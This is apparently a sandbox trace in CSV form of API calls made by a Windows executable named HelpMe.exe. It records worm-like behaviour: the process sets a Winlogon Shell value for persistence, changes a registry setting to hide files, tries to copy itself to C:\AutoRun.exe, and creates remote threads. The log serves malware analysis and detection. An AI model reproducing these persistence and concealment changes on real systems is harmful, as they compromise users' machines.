"20190910075320.660","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x0000016c","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910075320.660","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000016c","lpValueName->REGDBVersion"
"20190910075320.660","612","HelpMe.exe","1984","memory","VirtualAllocEx","SUCCESS","0x00b10000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00000000","dwSize->65536","flAllocationType->0x00002000","flProtect->0x00000001"
"20190910075320.680","612","HelpMe.exe","1984","memory","VirtualAllocEx","SUCCESS","0x00b10000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00b10000","dwSize->4096","flAllocationType->0x00001000","flProtect->0x00000004"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x0000016e","hKey->0x000000f2","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000016e","lpSubKey->TreatAs"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x0000017a","hKey->0x000000f2","lpSubKey->(null)"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x0000016e","hKey->0x0000017a","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x0000017e","hKey->0x0000016e","lpSubKey->InprocServer32"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegQueryValueExW","FAILURE","","hKey->0x0000017e","lpValueName->InprocServer32"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000016e","lpSubKey->InprocServerX86"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000016e","lpSubKey->LocalServer32"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x0000017e","hKey->0x0000016e","lpSubKey->InprocServer32"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000017e","lpValueName->(null)"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000016e","lpSubKey->InprocHandler32"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000016e","lpSubKey->InprocHandlerX86"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000016e","lpSubKey->LocalServer32"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000016e","lpSubKey->LocalServer"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x0000017e","hKey->0x0000017a","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegQueryValueExW","FAILURE","","hKey->0x0000017e","lpValueName->AppID"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x0000016e","hKey->0x0000017a","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x0000016e","hKey->0x0000017a","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x0000017e","hKey->0x0000016e","lpSubKey->InprocServer32"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000017e","lpValueName->ThreadingModel"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x0000016e","hKey->HKEY_CLASSES_ROOT","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000016e","lpSubKey->TreatAs"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x0000017c","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x00000180","hKey->0x0000017c","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000180","lpValueName->Generation"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x00000182","hKey->HKEY_CLASSES_ROOT","lpSubKey->Drive\shellex\FolderExtensions"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x0000017e","hKey->HKEY_CLASSES_ROOT","lpSubKey->Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000017e","lpValueName->DriveMask"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x00000180","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegQueryValueExW","FAILURE","","hKey->0x00000180","lpValueName->AllowFileCLSIDJunctions"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegCreateKeyExW","SUCCESS","0x00000180","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000180","lpValueName->Personal"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegCreateKeyExW","SUCCESS","0x00000180","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegSetValueExW","SUCCESS","","hKey->0x00000180","lpValueName->Personal","dwType->1","lpData->C:\Documents and Settings\janettedoe\My Documents","cbData->100"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x00000180","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegOpenKeyExW","SUCCESS","0x0000017c","hKey->0x00000180","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910075320.680","612","HelpMe.exe","1984","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000017c","lpValueName->Generation"
612.csv
"20190910080046.412","1376","HelpMe.exe","372","memory","VirtualAllocEx","SUCCESS","0x00a90000","th32ProcessID->1376","szExeFile->HelpMe.exe","lpAddress->0x00000000","dwSize->4096","flAllocationType->0x00001000","flProtect->0x00000040"
"20190910080046.442","1376","HelpMe.exe","372","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190910080046.442","1376","HelpMe.exe","372","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190910080046.442","1376","HelpMe.exe","372","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190910080046.442","1376","HelpMe.exe","372","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190910080046.442","1376","HelpMe.exe","372","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190910080046.442","1376","HelpMe.exe","372","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190910080046.442","1376","HelpMe.exe","372","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190910080046.452","1376","HelpMe.exe","372","filesystem","CreateFileW","SUCCESS","0x00000088","lpFileName->C:\WINDOWS\system32\HelpMe.exe","dwDesiredAccess->GENERIC_READ"
"20190910080046.452","1376","HelpMe.exe","372","filesystem","ReadFile","SUCCESS","","hFile->0x00000088","nNumberOfBytesToRead->268"
"20190910080046.452","1376","HelpMe.exe","372","filesystem","CreateFileW","FAILURE","","lpFileName->C:\WINDOWS\system32\HelpMe.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190910080046.452","1376","HelpMe.exe","372","memory","VirtualAllocEx","SUCCESS","0x00aa0000","th32ProcessID->1376","szExeFile->HelpMe.exe","lpAddress->0x00000000","dwSize->65536","flAllocationType->0x00002000","flProtect->0x00000004"
"20190910080046.452","1376","HelpMe.exe","372","memory","VirtualAllocEx","SUCCESS","0x00aa0000","th32ProcessID->1376","szExeFile->HelpMe.exe","lpAddress->0x00aa0000","dwSize->257","flAllocationType->0x00001000","flProtect->0x00000004"
"20190910080046.512","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x00000080","hKey->0x00000094","lpSubKey->Software\Microsoft\Windows\CurrentVersion\ThemeManager"
"20190910080046.512","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x00000080","lpValueName->Compositing"
"20190910080046.512","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x00000080","hKey->0x00000094","lpSubKey->Control Panel\Desktop"
"20190910080046.512","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x00000080","lpValueName->LameButtonText"
"20190910080046.512","1376","HelpMe.exe","372","system","LoadLibraryA","SUCCESS","0x5ad70000","lpFileName->uxtheme.dll"
"20190910080051.449","1376","HelpMe.exe","372","process","CreateRemoteThread","SUCCESS","0x00000094","lpStartAddress->0x00404008","th32ProcessID->1376","szExeFile->HelpMe.exe"
"20190910080051.449","1376","HelpMe.exe","372","process","CreateRemoteThread","SUCCESS","0x00000098","lpStartAddress->0x00404008","th32ProcessID->1376","szExeFile->HelpMe.exe"
"20190910080051.459","1376","HelpMe.exe","372","registry","RegCreateKeyExW","SUCCESS","0x000000a0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SoftWare\Microsoft\Windows NT\CurrentVersion\Winlogon"
"20190910080051.459","1376","HelpMe.exe","372","registry","RegSetValueExA","SUCCESS","","hKey->0x000000a0","lpValueName->Shell","dwType->1","lpData->Explorer.exe  HelpMe.exe","cbData->25"
"20190910080051.459","1376","HelpMe.exe","372","registry","RegCreateKeyExW","SUCCESS","0x000000a4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL"
"20190910080051.459","1376","HelpMe.exe","372","registry","RegSetValueExA","SUCCESS","","hKey->0x000000a4","lpValueName->CheckedValue","dwType->4","lpData->0","cbData->4"
"20190910080051.459","1376","HelpMe.exe","372","registry","RegCreateKeyExW","SUCCESS","0x000000ac","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190910080051.459","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000ac","lpValueName->Startup"
"20190910080051.459","1376","HelpMe.exe","372","registry","RegCreateKeyExW","SUCCESS","0x000000ac","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190910080051.459","1376","HelpMe.exe","372","registry","RegSetValueExW","SUCCESS","","hKey->0x000000ac","lpValueName->Startup","dwType->1","lpData->C:\Documents and Settings\janettedoe\Start Menu\Programs\Startup","cbData->130"
"20190910080051.459","1376","HelpMe.exe","372","system","LoadLibraryA","SUCCESS","0x774e0000","lpFileName->ole32.dll"
"20190910080051.459","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.459","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000b0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.459","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000b0","lpValueName->NoNetHood"
"20190910080051.459","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.459","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000b0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.459","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000b0","lpValueName->NoPropertiesMyComputer"
"20190910080051.459","1376","HelpMe.exe","372","filesystem","CreateFileW","SUCCESS","0x000000b0","lpFileName->C:\WINDOWS\system32\HelpMe.exe","dwDesiredAccess->GENERIC_READ"
"20190910080051.459","1376","HelpMe.exe","372","filesystem","CopyFileExW","FAILURE","","lpExistingFileName->C:\WINDOWS\system32\HelpMe.exe","lpNewFileName->C:\AutoRun.exe"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x00000098","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x00000098","lpValueName->NoInternetIcon"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegOpenKeyExA","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\HelpMe.exe"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x00000098","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x00000098","lpValueName->NoCommonGroups"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegOpenKeyExA","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x00000098","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x00000098","lpValueName->NoControlPanel"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x00000098","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x00000098","lpValueName->NoSetFolders"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegOpenKeyExA","SUCCESS","0x0000009a","hKey->HKEY_CLASSES_ROOT","lpSubKey->CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000009a","lpValueName->(null)"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000b4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->System\Setup"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->SystemSetupInProgress"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SYSTEM\CurrentControlSet\Control\MiniNT"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000b4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->System\WPA\PnP"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->seed"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000b4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SYSTEM\Setup"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->OsLoaderPath"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->OsLoaderPath"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000b4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SYSTEM\Setup"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->SystemPartition"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->SystemPartition"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000b4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->SourcePath"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->SourcePath"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000b4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->ServicePackSourcePath"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->ServicePackSourcePath"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000b4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->ServicePackCachePath"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->ServicePackCachePath"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000b4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->DriverCachePath"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->DriverCachePath"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000b4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b4","lpValueName->DevicePath"
"20190910080051.479","1376","HelpMe.exe","372","synchronization","CreateMutexW","SUCCESS","0x000000b0","lpName->(null)"
"20190910080051.479","1376","HelpMe.exe","372","synchronization","CreateMutexW","SUCCESS","0x000000bc","lpName->(null)"
"20190910080051.479","1376","HelpMe.exe","372","synchronization","CreateMutexW","SUCCESS","0x000000c4","lpName->(null)"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000c8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000c8","lpValueName->LogLevel"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000c8","lpValueName->LogLevel"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000c8","lpValueName->LogPath"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->0x000000c8","lpSubKey->AppLogLevels"
"20190910080051.479","1376","HelpMe.exe","372","system","LoadLibraryA","SUCCESS","0x77920000","lpFileName->SETUPAPI.dll"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Rpc\PagedBuffers"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegOpenKeyExA","SUCCESS","0x000000c8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Rpc"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpMe.exe\RpcThreadPoolThrottle"
"20190910080051.479","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Policies\Microsoft\Windows NT\Rpc"
"20190910080051.479","1376","HelpMe.exe","372","system","LoadLibraryW","SUCCESS","0x77e70000","lpFileName->rpcrt4.dll"
"20190910080051.479","1376","HelpMe.exe","372","filesystem","CreateFileW","SUCCESS","0x000000ec","lpFileName->\\.\PIPE\lsarpc","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190910080051.519","1376","HelpMe.exe","372","filesystem","CreateFileW","SUCCESS","0x000000e8","lpFileName->\\.\PIPE\lsarpc","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190910080051.539","1376","HelpMe.exe","372","device","DeviceIoControl","SUCCESS","","hDevice->0x000000f0","dwIoControlCode->0x004d0008","lpInBuffer->0x00000000","nInBufferSize->0x00000000","lpOutBuffer->0x0120f37c","nOutBufferSize->0x00000208","lpBytesReturned->0x0120f374","lpOverlapped->0x00000000"
"20190910080051.539","1376","HelpMe.exe","372","filesystem","CreateFileW","SUCCESS","0x000000f0","lpFileName->\\.\MountPointManager","dwDesiredAccess->ATTRIBUTES"
"20190910080051.539","1376","HelpMe.exe","372","device","DeviceIoControl","FAILURE","","hDevice->0x000000f0","dwIoControlCode->0x006d0008","lpInBuffer->0x00157af8","nInBufferSize->0x00000046","lpOutBuffer->0x00156e78","nOutBufferSize->0x00000020","lpBytesReturned->0x0120f374","lpOverlapped->0x00000000"
"20190910080051.539","1376","HelpMe.exe","372","device","DeviceIoControl","SUCCESS","","hDevice->0x000000f0","dwIoControlCode->0x006d0008","lpInBuffer->0x00157af8","nInBufferSize->0x00000046","lpOutBuffer->0x00146030","nOutBufferSize->0x000000ee","lpBytesReturned->0x0120f374","lpOverlapped->0x00000000"
"20190910080051.539","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910080051.539","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f4","hKey->0x000000f0","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910080051.539","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f4","lpValueName->Data"
"20190910080051.539","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f4","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910080051.539","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f0","hKey->0x000000f4","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910080051.539","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f0","lpValueName->Generation"
"20190910080051.539","1376","HelpMe.exe","372","filesystem","CreateFileW","SUCCESS","0x000000f0","lpFileName->\\.\MountPointManager","dwDesiredAccess->ATTRIBUTES"
"20190910080051.549","1376","HelpMe.exe","372","device","DeviceIoControl","FAILURE","","hDevice->0x000000f0","dwIoControlCode->0x006d0034","lpInBuffer->0x00158b30","nInBufferSize->0x00000208","lpOutBuffer->0x00156078","nOutBufferSize->0x00000008","lpBytesReturned->0x0120f884","lpOverlapped->0x00000000"
"20190910080051.549","1376","HelpMe.exe","372","device","DeviceIoControl","SUCCESS","","hDevice->0x000000f0","dwIoControlCode->0x006d0034","lpInBuffer->0x00158b30","nInBufferSize->0x00000208","lpOutBuffer->0x00158d40","nOutBufferSize->0x00000010","lpBytesReturned->0x0120f884","lpOverlapped->0x00000000"
"20190910080051.549","1376","HelpMe.exe","372","filesystem","CreateFileW","SUCCESS","0x000000f0","lpFileName->\\.\MountPointManager","dwDesiredAccess->ATTRIBUTES"
"20190910080051.549","1376","HelpMe.exe","372","device","DeviceIoControl","FAILURE","","hDevice->0x000000f0","dwIoControlCode->0x006d0034","lpInBuffer->0x00158b30","nInBufferSize->0x00000208","lpOutBuffer->0x00156078","nOutBufferSize->0x00000008","lpBytesReturned->0x0120f884","lpOverlapped->0x00000000"
"20190910080051.569","1376","HelpMe.exe","372","device","DeviceIoControl","SUCCESS","","hDevice->0x000000f0","dwIoControlCode->0x006d0034","lpInBuffer->0x00158b30","nInBufferSize->0x00000208","lpOutBuffer->0x00158d58","nOutBufferSize->0x00000010","lpBytesReturned->0x0120f884","lpOverlapped->0x00000000"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegCreateKeyExW","SUCCESS","0x000000f0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegSetValueExW","SUCCESS","","hKey->0x000000f0","lpValueName->BaseClass","dwType->1","lpData->Drive","cbData->12"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f4","hKey->0x000000f0","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f4","lpValueName->Generation"
"20190910080051.569","1376","HelpMe.exe","372","system","LoadLibraryA","SUCCESS","0x7c9c0000","lpFileName->SHELL32.dll"
